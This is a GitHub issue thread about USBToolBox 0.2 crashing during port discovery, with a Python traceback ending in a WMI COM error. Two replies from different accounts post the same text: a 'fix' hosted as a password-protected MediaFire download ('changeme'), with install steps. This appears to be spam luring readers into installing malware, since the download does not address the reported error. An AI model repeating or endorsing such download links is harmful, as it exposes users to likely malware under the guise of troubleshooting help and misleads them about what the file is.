### ISSUE TITLE
USBToolBox Keeps crashing when discovering ports

### ISSUE THREAD

**Issue by gabaznv** [USBToolBox/tool#65]
Hi! so I need to map my usb, because I want macos, and when I try to discover ports, it automatically crashes the program, and this bug is on all of the releases. so ive tried running it with cmd, and i've found what seems to be the error

  #######################################################
 #                                           Port Discovery                                                #
#######################################################

Getting controllers...
Traceback (most recent call last):
  File "Windows.py", line 160, in <module>
  File "Windows.py", line 43, in __init__
  File "base.py", line 49, in __init__
  File "base.py", line 696, in monu
  File "utils.py", line 204, in start
  File "utils.py", line 188, in select
  File "base.py", line 221, in discover_ports
  File "Windows.py", line 134, in get_controllers
  File "Windows.py", line 57, in get_property_from_wmi
  File "wmi.py", line 1072, in query
  File "wmi.py", line 1072, in <listcomp>
  File "win32com\client\dynamic.py", line 322, in __getitem__
  File "win32com\client\util.py", line 41, in __getitem__
  File "win32com\client\util.py", line 62, in __GetIndex
pywintypes.com_error: (-2147217392, 'OLE error 0x80041010', None, None)
[14064] Failed to execute script 'Windows' due to unhandled exception!

(this is USBToolBox 0.2)

If somebody can help me figure this out, it would help me a lot

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
